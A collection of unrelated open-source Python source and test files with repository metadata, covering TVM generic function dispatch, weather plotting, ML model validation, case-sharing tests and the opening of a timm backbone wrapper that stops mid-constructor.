87cb617f9a131fa44e1693303aaddf70e7a4c403
|
d75083cd97ede706338ab413dbc964009456d01b
|
refs/heads/main
| 2023-09-04T11:24:26.263032
| 2023-09-04T07:26:00
| 2023-09-04T07:26:00
| 70,746,484
| 4,575
| 1,903
|
Apache-2.0
| 2023-09-14T19:06:33
| 2016-10-12T22:20:28
|
Python
|
UTF-8
|
Python
| false
| false
| 8,938
|
py
|
generic_func.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Generic function."""
import tvm._ffi
try:
from decorator import decorate
except ImportError:
# Allow decorator to be missing in runtime
if not tvm._ffi.base._RUNTIME_ONLY:
raise
from tvm.runtime import Object
from .target import Target
from . import _ffi_api
@tvm._ffi.register_object
class GenericFunc(Object):
"""GenericFunc node reference. This represents a generic function
that may be specialized for different targets. When this object is
called, a specialization is chosen based on the current target.
Note
----
Do not construct an instance of this object, it should only ever be
used as a return value from calling into C++.
"""
def __call__(self, *args):
return _ffi_api.GenericFuncCallFunc(self, *args)
def set_default(self, func, allow_override=False):
"""Set the default function to be used if no specializations match
the current target.
Parameters
----------
func : function
The default function
allow_override : bool
Whether to allow the current default to be overridden
"""
_ffi_api.GenericFuncSetDefault(self, func, allow_override)
def register(self, func, key_list, allow_override=False):
"""Register a specialization for this GenericFunc.
Parameters
----------
func : function
The function to be registered.
key : str or list of str
The key to be registered.
allow_override : bool, optional
Whether to allow existing keys to be overridden.
"""
key_list = [key_list] if isinstance(key_list, str) else key_list
_ffi_api.GenericFuncRegisterFunc(self, func, key_list, allow_override)
def get_packed_func(self):
"""Get the packed function specified for the current target.
Returns
-------
func : PackedFunc
The function specified for the current target. Return the default
function if no specializations match the current target.
"""
return _ffi_api.GenericFuncGetPackedFunc(self)
def get_native_generic_func(name):
"""Get a generic function from the global registry. If no
function is registered under the given name, a new generic
function is created.
Parameters
----------
name : string
The name of the generic function to get
Returns
-------
func : GenericFunc
The generic function for the given name
"""
return _ffi_api.GenericFuncGetGlobal(name)
def override_native_generic_func(func_name):
"""Override a generic function defined in C++
Generic function allows registration of further functions
that can be dispatched on current target context.
If no registered dispatch is matched, the fdefault will be called.
Parameters
----------
func_name : string
The name of the generic func to be overridden
Returns
-------
fgeneric : function
A wrapped generic function.
Example
-------
.. code-block:: python
import tvm
# wrap function as target generic
@tvm.target.override_native_generic_func("my_func")
def my_func(a):
return a + 1
# register specialization of my_func under target cuda
@my_func.register("cuda")
def my_func_cuda(a):
return a + 2
# displays 3, because my_func is called
print(my_func(2))
# displays 4, because my_func_cuda is called
with tvm.target.cuda():
print(my_func(2))
"""
generic_func_node = get_native_generic_func(func_name)
def fdecorate(fdefault):
"""Wrap a target generic function, overriding the previous
default that was set for the generic function.
Parameters
----------
fdefault : function
The default function.
Returns
-------
fgeneric : function
A wrapped generic function.
"""
generic_func_node.set_default(fdefault, allow_override=True)
def register(key, func=None, override=True):
"""Register function to be the dispatch function.
Parameters
----------
key : str or list of str
The key to be registered.
func : function
The function to be registered.
override : bool, optional
Whether override existing registration.
Returns
-------
            The registered function, or a decorator that performs the registration when func is None.
"""
def _do_reg(myf):
generic_func_node.register(myf, key, override)
return myf
if func:
return _do_reg(func)
return _do_reg
def dispatch_func(func, *args, **kwargs):
# pylint: disable=unused-argument
"""The wrapped dispath function"""
if kwargs:
raise RuntimeError(
"Keyword arguments cannot be used when invoking generic_func %s" % func_name
)
return generic_func_node(*args)
fresult = decorate(fdefault, dispatch_func)
fresult.fdefault = fdefault
fresult.register = register
fresult.generic_func_node = generic_func_node
return fresult
return fdecorate
def generic_func(fdefault):
"""Wrap a target generic function.
Generic function allows registration of further functions
that can be dispatched on current target context.
If no registered dispatch is matched, the fdefault will be called.
Parameters
----------
fdefault : function
The default function.
Returns
-------
fgeneric : function
A wrapped generic function.
Example
-------
.. code-block:: python
import tvm
# wrap function as target generic
@tvm.target.generic_func
def my_func(a):
return a + 1
# register specialization of my_func under target cuda
@my_func.register("cuda")
def my_func_cuda(a):
return a + 2
# displays 3, because my_func is called
print(my_func(2))
# displays 4, because my_func_cuda is called
with tvm.target.cuda():
print(my_func(2))
"""
dispatch_dict = {}
func_name = fdefault.__name__
def register(key, func=None, override=False):
"""Register function to be the dispatch function.
Parameters
----------
key : str or list of str
The key to be registered.
func : function
The function to be registered.
override : bool
Whether override existing registration.
Returns
-------
        The registered function, or a decorator that performs the registration when func is None.
"""
def _do_reg(myf):
key_list = [key] if isinstance(key, str) else key
for k in key_list:
if k in dispatch_dict and not override:
raise ValueError("Key is already registered for %s" % func_name)
dispatch_dict[k] = myf
return myf
if func:
return _do_reg(func)
return _do_reg
def dispatch_func(func, *args, **kwargs):
"""The wrapped dispatch function"""
target = Target.current()
if target is None:
return func(*args, **kwargs)
for k in target.keys:
if k in dispatch_dict:
return dispatch_dict[k](*args, **kwargs)
return func(*args, **kwargs)
def get_packed_func():
"""The wrapped to get dispatched function"""
target = Target.current()
if target is None:
return fdefault
for k in target.keys:
if k in dispatch_dict:
return dispatch_dict[k]
return fdefault
fdecorate = decorate(fdefault, dispatch_func)
fdecorate.register = register
fdecorate.fdefault = fdefault
fdecorate.dispatch_dict = dispatch_dict
fdecorate.get_packed_func = get_packed_func
return fdecorate
|
9dc35bbd5147a10536069e970ea4f85d7760ebde
|
d5e1591a6b96ec0e35ea223269da38b15fffe600
|
/tests/web/test_vpath_args.py
|
44e8e8b88fdfb85fe5b9368d561bed5c4e7c2b43
|
[
"MIT"
] |
permissive
|
circuits/circuits
|
630cfa0fa13b19f84bfb96705912f3f6a26c69e1
|
87fb5a3380069d907d2ac500d13418b1abdeb2f2
|
refs/heads/master
| 2023-07-31T07:17:06.706151
| 2023-02-07T19:39:20
| 2023-02-07T19:39:20
| 12,450,349
| 310
| 80
|
NOASSERTION
| 2023-01-06T00:08:37
| 2013-08-29T03:05:42
|
Python
|
UTF-8
|
Python
| false
| false
| 685
|
py
|
test_vpath_args.py
|
#!/usr/bin/env python
from circuits.web import Controller, expose
from .helpers import urlopen
class Root(Controller):
@expose("test.txt")
def index(self):
return "Hello world!"
class Leaf(Controller):
channel = "/test"
@expose("test.txt")
def index(self, vpath=None):
if vpath is None:
return "Hello world!"
else:
return "Hello world! " + vpath
def test(webapp):
Leaf().register(webapp)
f = urlopen(webapp.server.http.base + "/test.txt")
s = f.read()
assert s == b"Hello world!"
f = urlopen(webapp.server.http.base + "/test/test.txt")
s = f.read()
assert s == b"Hello world!"
|
aa4b7fd5a516164cc7aeee8f62fa155d419caf1a
|
f6aac61a48a87743be9c40fecdc24344bae4d263
|
/htdocs/plotting/auto/scripts/p40.py
|
362d829d23dfa2bfa3ed4bfc34304f7261bae54e
|
[
"MIT"
] |
permissive
|
akrherz/iem
|
8714d99b371c8818f7cdde73dd24639e9fc7d42b
|
178015584b7fb5b585f65be6013eaf16fb6db0c7
|
refs/heads/main
| 2023-08-19T02:58:24.507782
| 2023-08-18T12:08:31
| 2023-08-18T12:08:31
| 4,253,774
| 118
| 74
|
MIT
| 2023-09-14T18:28:41
| 2012-05-07T20:32:59
|
Python
|
UTF-8
|
Python
| false
| false
| 7,044
|
py
|
p40.py
|
"""
This chart is an attempted illustration of the
amount of cloudiness that existed at a METAR site for a given month.
The chart combines reports of cloud amount and level to provide a visual
representation of the cloudiness. Once the METAR site hits a cloud level
of overcast, it can no longer sense clouds above that level. So while the
chart will indicate cloudiness up to the top, it may not have been like
that in reality.
"""
import datetime
import numpy as np
import pandas as pd
from matplotlib.patches import Rectangle
from pyiem.exceptions import NoDataFound
from pyiem.plot import figure, get_cmap
from pyiem.util import get_autoplot_context, get_sqlalchemy_conn, utc
PDICT = {"sky": "Sky Coverage + Visibility", "vsby": "Just Visibility"}
def get_description():
"""Return a dict describing how to call this plotter"""
desc = {"description": __doc__, "data": True, "cache": 3600}
today = datetime.date.today()
desc["arguments"] = [
dict(
type="zstation",
name="zstation",
default="DSM",
network="IA_ASOS",
label="Select Station:",
),
dict(
type="month",
name="month",
label="Select Month:",
default=today.month,
),
dict(
type="select",
options=PDICT,
name="ptype",
default="sky",
label="Available Plot Types",
),
dict(
type="year",
name="year",
label="Select Year:",
default=today.year,
min=1970,
),
]
return desc
def plot_sky(days, vsby, data, ctx, sts):
"""Sky plot variant."""
fig = figure(apctx=ctx)
# vsby plot
ax = fig.add_axes([0.1, 0.08, 0.8, 0.03])
ax.set_xticks(np.arange(0, int(days * 24) - 1, 24))
ax.set_xticklabels(np.arange(1, days + 1))
ax.set_yticks([])
cmap = get_cmap("gray")
cmap.set_bad("white")
res = ax.imshow(
vsby,
aspect="auto",
extent=[0, days * 24, 0, 1],
vmin=0,
cmap=cmap,
vmax=10,
)
cax = fig.add_axes([0.915, 0.08, 0.035, 0.2])
fig.colorbar(res, cax=cax)
fig.text(0.02, 0.09, "Visibility\n[miles]", va="center")
# clouds
ax = fig.add_axes([0.1, 0.16, 0.8, 0.7])
ax.set_facecolor("skyblue")
ax.set_xticks(np.arange(0, int(days * 24) - 1, 24))
ax.set_xticklabels(np.arange(1, days + 1))
fig.text(
0.5,
0.935,
f"{ctx['_sname']}:: {sts:%b %Y} "
"Clouds & Visibility\nbased on ASOS METAR Cloud Amount ",
ha="center",
fontsize=14,
)
cmap = get_cmap("gray_r")
cmap.set_bad("white")
cmap.set_under("skyblue")
ax.imshow(
np.flipud(data),
aspect="auto",
extent=[0, days * 24, 0, 250],
cmap=cmap,
vmin=1,
)
ax.set_yticks(range(0, 260, 50))
ax.set_yticklabels(range(0, 26, 5))
ax.set_ylabel("Cloud Levels [1000s feet]")
fig.text(0.45, 0.02, f"Day of {sts:%b %Y} (UTC Timezone)")
r1 = Rectangle((0, 0), 1, 1, fc="skyblue")
r2 = Rectangle((0, 0), 1, 1, fc="white")
r3 = Rectangle((0, 0), 1, 1, fc="k")
r4 = Rectangle((0, 0), 1, 1, fc="#EEEEEE")
ax.grid(True)
ax.legend(
[r1, r4, r2, r3],
["Clear", "Some", "Unknown", "Obscured by Overcast"],
loc="lower center",
fontsize=14,
bbox_to_anchor=(0.5, 0.99),
fancybox=True,
shadow=True,
ncol=4,
)
return fig
def plot_vsby(days, vsby, ctx, sts):
"""Sky plot variant."""
fig = figure(apctx=ctx)
# need to convert vsby to 2-d
data = np.ones((100, days * 24)) * -3
for i in range(days * 24):
val = vsby[0, i]
if np.ma.is_masked(val):
continue
val = min([int(val * 10), 100])
data[val:, i] = val / 10.0
data[:val, i] = -1
data = np.ma.array(data, mask=np.where(data < -1, True, False))
# clouds
ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
ax.set_facecolor("skyblue")
ax.set_xticks(np.arange(1, days * 24 + 1, 24))
ax.set_xticklabels(np.arange(1, days + 1))
fig.text(
0.5,
0.935,
f"{ctx['_sname']}:: {sts:%b %Y} "
"Visibility\nbased on hourly ASOS METAR Visibility Reports",
ha="center",
fontsize=14,
)
cmap = get_cmap("gray")
cmap.set_bad("white")
cmap.set_under("skyblue")
res = ax.imshow(
np.flipud(data),
aspect="auto",
extent=[0, days * 24, 0, 100],
cmap=cmap,
vmin=0,
vmax=10,
)
cax = fig.add_axes([0.915, 0.08, 0.035, 0.2])
fig.colorbar(res, cax=cax)
ax.set_yticks(range(0, 101, 10))
ax.set_yticklabels(range(0, 11, 1))
ax.set_ylabel("Visibility [miles]")
fig.text(0.45, 0.02, f"Day of {sts:%b %Y} (UTC Timezone)")
ax.grid(True)
return fig
def plotter(fdict):
"""Go"""
ctx = get_autoplot_context(fdict, get_description())
station = ctx["zstation"]
year = ctx["year"]
month = ctx["month"]
ptype = ctx["ptype"]
    # Compute the UTC window that covers approximately the given month
sts = utc(year, month, 1, 0, 0)
ets = (sts + datetime.timedelta(days=35)).replace(day=1)
days = (ets - sts).days
data = np.ones((250, days * 24)) * -1
vsby = np.ones((1, days * 24)) * -1
with get_sqlalchemy_conn("asos") as conn:
df = pd.read_sql(
"""
SELECT valid at time zone 'UTC' as valid,
skyc1, skyc2, skyc3, skyc4, skyl1, skyl2, skyl3, skyl4, vsby,
extract(epoch from (valid - %s))/3600. as hours
from alldata where station = %s and valid BETWEEN %s and %s
and report_type = 3 ORDER by valid ASC
""",
conn,
params=(sts, station, sts, ets),
index_col=None,
)
lookup = {"CLR": 0, "FEW": 25, "SCT": 50, "BKN": 75, "OVC": 100}
if df.empty:
raise NoDataFound("No database entries found for station, sorry!")
for _, row in df.iterrows():
delta = int(row["hours"] - 1)
data[:, delta] = 0
if not np.isnan(row["vsby"]):
vsby[0, delta] = row["vsby"]
for i in range(1, 5):
a = lookup.get(row[f"skyc{i}"], -1)
if a >= 0:
skyl = row[f"skyl{i}"]
if skyl is not None and skyl > 0:
skyl = int(skyl / 100)
if skyl >= 250:
continue
data[skyl : skyl + 4, delta] = a
data[skyl + 3 :, delta] = min(a, 75)
data = np.ma.array(data, mask=np.where(data < 0, True, False))
vsby = np.ma.array(vsby, mask=np.where(vsby < 0, True, False))
if ptype == "vsby":
fig = plot_vsby(days, vsby, ctx, sts)
else:
fig = plot_sky(days, vsby, data, ctx, sts)
return fig, df
if __name__ == "__main__":
plotter({})
|
411984ae30eb4d3fcd9c0830069768cce1648e1e
|
be540a0f683235a6be13ca9f6150509ade957887
|
/motrackers/utils/filechooser_utils.py
|
eef639de12939d5d368c08598d458a5e527e0311
|
[
"MIT"
] |
permissive
|
adipandas/multi-object-tracker
|
9890873c111fb70c86de0efd7476124f9f722184
|
5d5474f4d95cb5aa4be21a4d14f4333a392579d5
|
refs/heads/master
| 2023-08-31T13:33:33.278920
| 2023-06-01T15:25:07
| 2023-06-01T15:25:07
| 148,338,463
| 672
| 97
|
MIT
| 2023-08-10T08:33:12
| 2018-09-11T15:25:03
|
Python
|
UTF-8
|
Python
| false
| false
| 3,619
|
py
|
filechooser_utils.py
|
from ipyfilechooser import FileChooser
def create_filechooser(default_path="~/", html_title="Select File", use_dir_icons=True):
fc = FileChooser(default_path)
fc.title = html_title
fc.use_dir_icons = use_dir_icons
return fc
def select_caffemodel_prototxt(default_path="~/", use_dir_icons=True):
html_title = '<b>Select <code>.prototxt</code> file for the caffemodel:</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_caffemodel_weights(default_path="~/", use_dir_icons=True):
    html_title = '<b>Select caffemodel weights (file with extension <code>.caffemodel</code>):</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_caffemodel(default_path="~/", use_dir_icons=True):
prototxt = select_caffemodel_prototxt(default_path=default_path, use_dir_icons=use_dir_icons)
weights = select_caffemodel_weights(default_path=default_path, use_dir_icons=use_dir_icons)
return prototxt, weights
def select_videofile(default_path="~/", use_dir_icons=True):
html_title = '<b>Select video file:</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_yolo_weights(default_path="~/", use_dir_icons=True):
html_title = '<b>Select YOLO weights (<code>.weights</code> file):</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_coco_labels(default_path="~/", use_dir_icons=True):
    html_title = '<b>Select coco labels file (<code>.names</code> file):</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_yolo_config(default_path="~/", use_dir_icons=True):
html_title = '<b>Choose YOLO config file (<code>.cfg</code> file):</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_yolo_model(default_path="~/", use_dir_icons=True):
yolo_weights = select_yolo_weights(default_path, use_dir_icons)
yolo_config = select_yolo_config(default_path, use_dir_icons)
coco_names = select_coco_labels(default_path, use_dir_icons)
return yolo_weights, yolo_config, coco_names
def select_pbtxt(default_path="~/", use_dir_icons=True):
html_title = '<b>Select <code>.pbtxt</code> file:</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_tfmobilenet_weights(default_path="~/", use_dir_icons=True):
html_title = '<b>Select tf-frozen graph of mobilenet (<code>.pb</code> file):</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_tfmobilenet(default_path="~/", use_dir_icons=True):
prototxt = select_pbtxt(default_path, use_dir_icons)
tfweights = select_tfmobilenet_weights(default_path, use_dir_icons)
return prototxt, tfweights
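# Hedged usage sketch (illustrative only): in a Jupyter notebook the chooser
# widgets above are displayed first, then read back once the user picks a file.
# ``display`` comes from IPython; ``fc.selected`` is the ipyfilechooser API.
def _example_notebook_usage():
    from IPython.display import display
    fc = select_videofile()
    display(fc)         # renders the interactive widget in the notebook
    return fc.selected  # full path of the chosen file (None until one is picked)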
|
1b37d277619863e9b7354d33a9f00f5b6cfb9fcb
|
753cd066a9bd26b6c37c8d53a86c7a9c659ec18c
|
/vision/vit/pytorch/validation.py
|
716c9cba2dfedd9ba6ae17c07fac616067232883
|
[
"MIT",
"CC-BY-NC-4.0",
"BSD-3-Clause",
"Apache-2.0",
"HPND"
] |
permissive
|
graphcore/examples
|
ac872015808ed2a913d4d7bf0d63202ce15ebbae
|
e2f834dd60e7939672c1795b4ac62e89ad0bca49
|
refs/heads/master
| 2023-08-05T02:08:12.341836
| 2023-07-27T11:13:10
| 2023-07-27T11:13:10
| 143,977,106
| 311
| 80
|
MIT
| 2023-09-11T16:42:56
| 2018-08-08T07:29:17
|
Python
|
UTF-8
|
Python
| false
| false
| 3,960
|
py
|
validation.py
|
# Copyright (c) 2021 Graphcore Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file has been modified by Graphcore
import numpy as np
import poptorch
import torch
import transformers
import wandb
from args import parse_args
from dataset import get_data
from ipu_options import get_options
from log import logger
from metrics import accuracy
from models import PipelinedViTForImageClassification, PipelinedViTForImageClassificationPretraining
from checkpoint import restore_checkpoint
if __name__ == "__main__":
# Validation loop
# Build config from args
config = transformers.ViTConfig(**vars(parse_args()))
logger.info(f"Running config: {config.config}")
# W&B
if config.wandb:
wandb.init(
project=config.wandb_project_name, name=config.wandb_run_name, settings=wandb.Settings(console="wrap")
)
wandb.config.update(vars(config))
# Execution parameters
opts = get_options(config)
test_loader = get_data(config, opts, train=False, async_dataloader=True)
# Init from a checkpoint
if config.pretrain:
model = PipelinedViTForImageClassificationPretraining(config).eval()
model_state_dict = restore_checkpoint(config, val=True)
model.load_state_dict(model_state_dict)
else:
model = (
PipelinedViTForImageClassification.from_pretrained(config.pretrained_checkpoint, config=config)
.parallelize()
.train()
)
if config.precision.startswith("16."):
model.half()
valid_opts = poptorch.Options()
valid_opts.deviceIterations(config.device_iterations)
valid_opts.outputMode(poptorch.OutputMode.All)
valid_opts.Precision.enableStochasticRounding(False)
# Wrap in the PopTorch inference wrapper
inference_model = poptorch.inferenceModel(model, options=valid_opts)
all_preds, all_labels, all_losses = [], [], []
for step, (input_data, labels) in enumerate(test_loader):
        # if pretrain is True, the second output is accuracy; otherwise it is logits
losses, out = inference_model(input_data, labels)
all_labels.append(labels.detach().clone())
if not config.pretrain:
preds = torch.argmax(out, dim=-1)
acc = accuracy(preds, labels)
all_preds.append(preds.detach().clone())
else:
# out contains (config.samples_per_step / config.micro_batch_size) accuracies
# accuracy value is per micro batch, so undo the division to get accuracy
# per engine run
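            # e.g. (hypothetical numbers): micro_batch_size=4, samples_per_step=64
            # gives 16 per-micro-batch accuracies, so acc = sum(acc_i * 4) / 64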
acc = (out * config.micro_batch_size).sum() / config.samples_per_step
all_preds.append(out * config.micro_batch_size)
logger.info("Valid Loss: {:.3f} Acc: {:.3f}".format(torch.mean(losses).item(), acc))
if config.wandb:
wandb.log({"Loss": torch.mean(losses).item(), "Accuracy": acc})
all_labels = torch.cat(all_labels)
all_preds = torch.cat(all_preds)
num_samples = all_labels.shape[0]
if not config.pretrain:
val_accuracy = accuracy(all_preds, all_labels)
else:
val_accuracy = (all_preds.sum() / num_samples).item()
logger.info("\n")
logger.info("Validation Results")
logger.info("Valid Accuracy: %2.5f" % val_accuracy)
logger.info("Number of samples: %d" % num_samples)
if config.wandb:
wandb.log({"Total Accuracy": val_accuracy, "Number of samples": num_samples})
|
a05440db0ce3c1820bc54d69ff3025defff54ce8
|
e459a9608225b81bdb0a5b85cd19b7bd0f6df38e
|
/test_frame/other_tests/test_zeromq/test_zeromq_client.py
|
20f53c285e286113fbf698172298cf0976563973
|
[
"Apache-2.0"
] |
permissive
|
ydf0509/distributed_framework
|
722be4957df97bfece9ca5b43d81b4e3bb09ed8e
|
1b1f32ed928fa44e0fb13fc738de90cb4339f408
|
refs/heads/master
| 2022-05-20T10:19:05.727086
| 2022-03-31T11:16:22
| 2022-03-31T11:16:22
| 201,225,545
| 359
| 90
|
Apache-2.0
| 2021-05-08T16:50:53
| 2019-08-08T09:30:13
|
Python
|
UTF-8
|
Python
| false
| false
| 378
|
py
|
test_zeromq_client.py
|
import time
import zmq
# Prepare our context and sockets
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://localhost:5559")
# Do 10 requests, waiting each time for a response
for request in range(1,11):
time.sleep(2)
socket.send(f"Hello {request}".encode())
message = socket.recv()
print("Received reply %s [%s]" % (request, message))
|
b3da72a1f84544b2e29f1f9c3412156c074c17a5
|
578db86c51d44ebddd0dc7b1738985b3dc69eb74
|
/corehq/apps/hqcase/tests/test_case_sharing.py
|
ef4793be30e7e472fec5b6b2bbaa408316eb7a32
|
[
"BSD-3-Clause"
] |
permissive
|
dimagi/commcare-hq
|
a43c7dd32b5f89c89fd5aa1b1359ab7301f4ff6b
|
e7391ddae1af1dbf118211ecb52c83fc508aa656
|
refs/heads/master
| 2023-08-16T22:38:27.853437
| 2023-08-16T19:07:19
| 2023-08-16T19:07:19
| 247,278
| 499
| 203
|
BSD-3-Clause
| 2023-09-14T19:03:24
| 2009-07-09T17:00:07
|
Python
|
UTF-8
|
Python
| false
| false
| 4,811
|
py
|
test_case_sharing.py
|
from django.test import TestCase
from casexml.apps.case.mock import CaseBlock
from casexml.apps.case.tests.util import deprecated_check_user_has_case
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.groups.models import Group
from corehq.apps.hqcase.utils import submit_case_blocks
from corehq.apps.users.models import CommCareUser
from corehq.apps.users.util import format_username
class CaseSharingTest(TestCase):
def setUp(self):
"""
Two groups A and B, with users A1, A2 and B1, B2 respectively, and supervisor X who belongs to both.
"""
self.domain = "test-domain"
self.domain_obj = create_domain(self.domain)
password = "****"
def create_user(username):
return CommCareUser.create(self.domain, format_username(username, self.domain), password, None, None)
def create_group(name, *users):
group = Group(users=[user.user_id for user in users], name=name, domain=self.domain,
case_sharing=True)
group.save()
return group
self.userX = create_user("X")
self.userA1 = create_user("A1")
self.userA2 = create_user("A2")
self.userB1 = create_user("B1")
self.userB2 = create_user("B2")
self.groupA = create_group("A", self.userX, self.userA1, self.userA2)
self.groupB = create_group("B", self.userX, self.userB1, self.userB2)
def tearDown(self):
self.domain_obj.delete()
def test_sharing(self):
def create_and_test(case_id, user, owner, should_have, should_not_have):
case_block = self.get_create_block(
case_id=case_id,
type="case",
user_id=user.user_id,
owner_id=owner.get_id,
)
submit_case_blocks(case_block, domain=self.domain)
check_has_block(case_block, should_have, should_not_have)
def update_and_test(case_id, owner=None, should_have=None, should_not_have=None):
case_block = self.get_update_block(
case_id=case_id,
update={'greeting': "Hello!"},
owner_id=owner.get_id if owner else None,
)
submit_case_blocks(case_block, domain=self.domain)
check_has_block(case_block, should_have, should_not_have, line_by_line=False)
def check_has_block(case_block, should_have, should_not_have, line_by_line=True):
for user in should_have:
deprecated_check_user_has_case(self, user.to_ota_restore_user(user.domain),
case_block, line_by_line=line_by_line)
for user in should_not_have:
deprecated_check_user_has_case(self, user.to_ota_restore_user(user.domain),
case_block, should_have=False, line_by_line=line_by_line)
create_and_test(
case_id='case-a-1',
user=self.userA1,
owner=self.groupA,
should_have=[self.userA1, self.userA2, self.userX],
should_not_have=[self.userB1, self.userB2],
)
create_and_test(
case_id='case-b-1',
user=self.userB1,
owner=self.groupB,
should_have=[self.userB1, self.userB2, self.userX],
should_not_have=[self.userA1, self.userA2],
)
create_and_test(
case_id='case-a-2',
user=self.userX,
owner=self.groupA,
should_have=[self.userA1, self.userA2, self.userX],
should_not_have=[self.userB1, self.userB2],
)
update_and_test(
case_id='case-a-1',
should_have=[self.userA1, self.userA2, self.userX],
should_not_have=[self.userB1, self.userB2],
)
update_and_test(
case_id='case-a-1',
owner=self.groupB,
should_have=[self.userB1, self.userB2, self.userX],
should_not_have=[self.userA1, self.userA2],
)
def get_create_block(self, case_id, type, user_id, owner_id, name=None, **kwargs):
name = name or case_id
case_block = CaseBlock.deprecated_init(
create=True,
case_id=case_id,
case_name=name,
case_type=type,
user_id=user_id,
external_id=case_id,
owner_id=owner_id,
**kwargs
).as_text()
return case_block
def get_update_block(self, case_id, owner_id=None, update=None):
update = update or {}
kwargs = {'owner_id': owner_id} if owner_id else {}
case_block = CaseBlock.deprecated_init(
case_id=case_id,
update=update,
**kwargs,
).as_text()
return case_block
|
0deda2313a015dc3a0b887940d65b9b4cf6738c7
|
9241974e50a37303163303660f66f6b77cc5632a
|
/tests/commands/validate_manifest_test.py
|
a4bc8ac05215e472389c0f3a074e4f993bcf3589
|
[
"MIT"
] |
permissive
|
pre-commit/pre-commit
|
c138e1bd540c7515c10f0d61f3d7a4ef66d5bf0a
|
a1f1d1915646865be2fe84d04633ba964feb0ba0
|
refs/heads/main
| 2023-08-19T08:07:21.342724
| 2023-08-15T14:19:29
| 2023-08-15T14:19:29
| 17,689,377
| 10,804
| 912
|
MIT
| 2023-09-12T00:06:21
| 2014-03-13T00:39:38
|
Python
|
UTF-8
|
Python
| false
| false
| 519
|
py
|
validate_manifest_test.py
|
from __future__ import annotations
from pre_commit.commands.validate_manifest import validate_manifest
def test_validate_manifest_ok():
assert not validate_manifest(('.pre-commit-hooks.yaml',))
def test_not_ok(tmpdir):
not_yaml = tmpdir.join('f.notyaml')
not_yaml.write('{')
not_schema = tmpdir.join('notconfig.yaml')
not_schema.write('{}')
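    # For contrast, an illustrative minimal entry that would satisfy the
    # manifest schema (values are examples):
    #   - id: my-hook
    #     name: My hook
    #     entry: my-hook
    #     language: python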
assert validate_manifest(('does-not-exist',))
assert validate_manifest((not_yaml.strpath,))
assert validate_manifest((not_schema.strpath,))
|
58c3fb2300c91f42bc8970674832e20b53471813
|
c46754b9600a12df4f9d7a6320dfc19aa96b1e1d
|
/src/transformers/models/timm_backbone/modeling_timm_backbone.py
|
dc117f743642d8e518a8cb4a7139b22b6cfb2115
|
[
"Apache-2.0"
] |
permissive
|
huggingface/transformers
|
ccd52a0d7c59e5f13205f32fd96f55743ebc8814
|
4fa0aff21ee083d0197a898cdf17ff476fae2ac3
|
refs/heads/main
| 2023-09-05T19:47:38.981127
| 2023-09-05T19:21:33
| 2023-09-05T19:21:33
| 155,220,641
| 102,193
| 22,284
|
Apache-2.0
| 2023-09-14T20:44:49
| 2018-10-29T13:56:00
|
Python
|
UTF-8
|
Python
| false
| false
| 6,129
|
py
|
modeling_timm_backbone.py
|
# coding=utf-8
# Copyright 2023 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Optional, Tuple, Union
import torch
from ...modeling_outputs import BackboneOutput
from ...modeling_utils import PreTrainedModel
from ...utils import is_timm_available, is_torch_available, requires_backends
from ...utils.backbone_utils import BackboneMixin
from .configuration_timm_backbone import TimmBackboneConfig
if is_timm_available():
import timm
if is_torch_available():
from torch import Tensor
class TimmBackbone(PreTrainedModel, BackboneMixin):
"""
    Wrapper class for timm models to be used as backbones. This enables using the timm models interchangeably with the
    other models in the library, keeping the same API.
"""
main_input_name = "pixel_values"
supports_gradient_checkpointing = False
config_class = TimmBackboneConfig
def __init__(self, config, **kwargs):
requires_backends(self, "timm")
super().__init__(config)
self.config = config
if config.backbone is None:
raise ValueError("backbone is not set in the config. Please set it to a timm model name.")
if config.backbone not in timm.list_models():
raise ValueError(f"backbone {config.backbone} is not supported by timm.")
if hasattr(config, "out_features") and config.out_features is not None:
raise ValueError("out_features is not supported by TimmBackbone. Please use out_indices instead.")
pretrained = getattr(config, "use_pretrained_backbone", None)
if pretrained is None:
raise ValueError("use_pretrained_backbone is not set in the config. Please set it to True or False.")
# We just take the final layer by default. This matches the default for the transformers models.
out_indices = config.out_indices if getattr(config, "out_indices", None) is not None else (-1,)
self._backbone = timm.create_model(
config.backbone,
pretrained=pretrained,
# This is currently not possible for transformer architectures.
